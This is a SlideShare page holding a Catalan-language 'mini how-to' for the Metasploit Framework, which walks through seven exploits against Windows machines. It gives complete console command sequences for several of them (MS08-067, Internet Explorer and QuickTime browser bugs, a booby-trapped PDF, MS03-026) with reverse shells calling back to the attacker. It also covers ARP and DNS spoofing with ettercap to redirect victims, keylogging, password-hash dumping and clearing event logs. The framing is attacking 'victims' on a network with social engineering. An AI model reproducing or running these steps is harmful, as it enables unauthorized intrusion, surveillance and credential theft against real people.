• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Metasploit framework mini how-to
 

Metasploit framework mini how-to

on

  • 235 views

Metasploit Framework, mini how-to.

Metasploit Framework, mini how-to.

Més manuals a: http://www.exabyteinformatica.com

Statistics

Views

Total Views
235
Views on SlideShare
235
Embed Views
0

Actions

Likes
0
Downloads
5
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Metasploit framework mini how-to Metasploit framework mini how-to Document Transcript

    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/Metasploit Framework: Mini How-toAquest mini how-to us mostra amb exemples com sutilitzarien alguns exploits de Metasploitper explotar vulnerabilitats de Windows.Potser us semblaran poca cosa ja que mestic iniciant en això i vull que aquest post serveixi perseguir aprenent daquest tema i aporteu els vostres coneixements.Començar dient que Metasploit Framework es pot utilitzar tant en Linux com en Windows. Joutilitzo Backtrack ja que ho inclou, a més daltres eines que poden combinar-se ambMetasploit.Link de descàrrega: http://www.metasploit.com/download/Abans de llançar qualsevol exploit, és recomanable que coneguem les ips connectades a lanostra xarxa, per saber-ho fem:Linux:sudo nmap -sS -O 192.168.1.0-255(Canvieu 192.168.1.0 per la vostra IP 0 de la vostra lan)-sS --> Escanegem de forma silenciosa-O --> Perquè ens mostri el Sistema OperatiuWindows:net viewA part daixò aconsello també lús de leina Colasoft MAC Scanner per lescaneig de PCsconnectats a la xarxa.Executem el msfconsole de Metasploit Framework.Una vegada que coneixem les ips i els seus respectius Sistemes Operatius, per utilitzar elprimer exploit anem a intentar localitzar algun Windows XP.
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/(Recomanable que per veure si el pc està connectat fem ping a la seva IP).Primer exploit (netapi)use windows/smb/ms08_067_netapiset RHOST (ip equip remot)set payload windows/vncinject/reverse_tcpset LHOST (ip del nostre equip)exploitSens obrirà una pantalla remota amb el pc víctima.Com hem vist anteriorment, només serveix per Windows XP, vegem ara un que es pot utilitzaren qualsevol Sistema Windows aprofitant una vulnerabilitat en Internet Explorer (com ésnatural, la víctima ha dutilitzar com a navegador lInternet Explorer).Segon exploituse exploit/windows/browser/ms10_022_ie_vbscript_winhlp32set PAYLOAD windows/meterpreter/reverse_tcpset LHOST (la nostra IP)set LPORT 4442exploitSortirà una URL en la qual la víctima ha dentrar, esperem a que entri.sessions -i 1run vncSens obrirà una pantalla remota amb el pc víctima.
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/Tercer exploit (Semblat a lanterior)use exploit/windows/browser/ms11_003_ie_css_importset PAYLOAD windows/meterpreter/reverse_tcpset LHOST (la nostra IP)exploitSortirà una URL en la qual la víctima ha dentrar, esperem que entri.sessions -i 1run vncSens obrirà una pantalla remota amb el pc víctima.Suposem que no tenim possibilitat de passar-li la URL al pc víctima, per a això podem utilitzar:ettercap de la següent manera:ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /(ip víctima)/ //Daquesta manera quan sobri lexplorer anirà a aquesta URL directament. Per a això hem demodificar abans larxiu etter.dns. Per a això procedim de la següent manera:sudo gedit /usr/share/ettercap/etter.dnsBusquem la següent linea:################################## redirect it to www.linux.org#
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/I agreguem el següent:* A la nostra_ipEl * perquè quan entri a qualsevol URL es redireccioni a la URL Infectada.Cambra exploit (a través de pdf)use exploit/windows/fileformat/adobe_pdf_embedded_exeset FILENAME arxiu.pdf (arxiu que anem a crear, posem el nom que vulguem)set INFILENAME arxiu.pdf (arxiu net, li passem el nom del nostre pdf)set OUTPUTPATH /root/set PAYLOAD windows/meterpreter/reverse_tcpset LHOST (la nostra ip)set LPORT 4455set id 0exploitclearbackuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST (la nostra IP)set LPORT 4455set id 0exploitLi passem el pdf a la víctima i en obrir-lo ens donarà accés al seu PC.Cinquè exploit (vulnerabilitat de Quicktime)use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que anem a utilitzar)set SRVHOST 192.168.0.162 (IP local on va a muntar el servei)
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/set SRVPORT 80 (Port local del servei)set URIPATH jocs (Uri del servei)set payload windows/shell/reverse_tcp (Payload que anem a utilitzar)set LHOST 192.168.0.162 (IP on es connectarà la víctima)set LPORT 5050 (Port local descolta)exploit (Executem el exploit)Només faltaria que la nostra víctima es connectés al nostre servidor (192.168.0.162/jocs),aconseguint això usant una mica denginyeria social, perquè Metasploit ens informi que shacreat una nova sessió. Usem el següent comandament (sessions -i x) on x és el nombre desessió creat per connectar amb la víctima i sens retorni una shell reverse de la mateixa.Daquesta manera aconseguirem control total sobre el seu PC. Aquest mètode serveix per atotes les versions de Windows que tinguin instal·lat Quicktime.Sisè exploit (keylogger)use windows/smb/ms08_067_netapiset RHOST (ip equip remot)set PAYLOAD windows/meterpreter/bind_tcpexploitUna vegada llançat el exploit ja estarem dins del PC víctima, vegem els processos que técorrent:psAra migrarem el processo explorer.exe. Usant el comando següent:migrate (nº del procés).Iniciem el Keyloggerkeyscan_start
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/Amb lajuda del comandament keyscan_dump, veurem les tecles pressionades en lequipvíctima.keyscan_dumpTambé tenim la possibilitat de veure un ScreenShot de la pantalla víctima.use espiascreenshot /Imag.bmpFinalitzem el keylogger:keyscan_stopSetè exploit (Intrusió en Windows Server 2000)search exploit ms03_026_dcomuse exploit /windows/dcerpc/ms03_026_dcomshow targetsshow payloadsset payload generic/shell_bind_tcpshow optionsset RHOST [IP de la víctima]exploitUna vegada explotat el sistema podem fer moltes coses, heus aquí un llistat de comandos quepodem utilitzar:background -> Envia al segon pla la sesion activa.exit -> Acaba la sessió oberta de Meterpreter.help -> Mostra lajuda
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/irb -> Ens llança a lintèrpret de Ruby (irb).migrate -> Migra dun procés a un altre.quit -> Acaba la sessió oberta de Meterpreter.run -> Executa un script de Meterpreter. Pressionant dues vegades TAB veurem elsdisponibles.use -> Carrega una o mes extensions de Meterpreter. Pressionant dues vegades TAB veuremels disponibles.cat -> Mostra el contingut dun arxiu de text.cd -> Canvia a un directori.del -> Elimina un arxiu específic.download -> Descarrega un arxiu o directori a lequip local.editc -> Edita un arxiu.getlwd -> Mostra el directori local en el qual estem treballant.getwd -> Mostra el directori remot en el qual estem treballant.lcd -> Canvia a un directori local.lpwd -> Mostra el directori local en el qual estem treballant.ls -> Mostra els arxius continguts en un directori.mkdir -> Crea un directori.pwd -> Mostra el directori remot en el qual estem treballant.rm -> Elimina un arxiu específic.rmdir -> Elimina un directori específic.upload -> Puja un arxiu o directori a lequip remot.ipconfig -> Mostra les interfícies de xarxa.clearev -> Elimina els logs emmagatzemats en laplicació “Visor de Successos”execute -> Executa un comandament.getpid -> Mostra la identificació del procés en el qual estem.getuid -> Mostra lusuari en el qual estem actualment .kill -> Acaba un procés.
    • Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ps -> Mostra els processos en execució.reboot -> Reinicia lequip remot.reg -> Modifica i interactua amb el registre remot.shell -> Ens llança a una consola en lequip remot.shutdown -> Apaga lequip remot.sysinfo -> Ens mostra informació sobre lequip remot.keyscan_dump -> Mostra les pulsacions de tecles gravades.keyscan_start -> Comença a capturar pulsacions de tecles.keyscan_stop -> Atura la captura de pulsacions de tecles.hashdump -> Mostra el contingut de la base de dades SAM de Windows (Conté els usuaris ipasswords encriptades).De tant en tant reviso aquesta pàgina per aprendre una mica més sobre aquest ampli tema.Us la recomano http://www.metasploit.com/modules/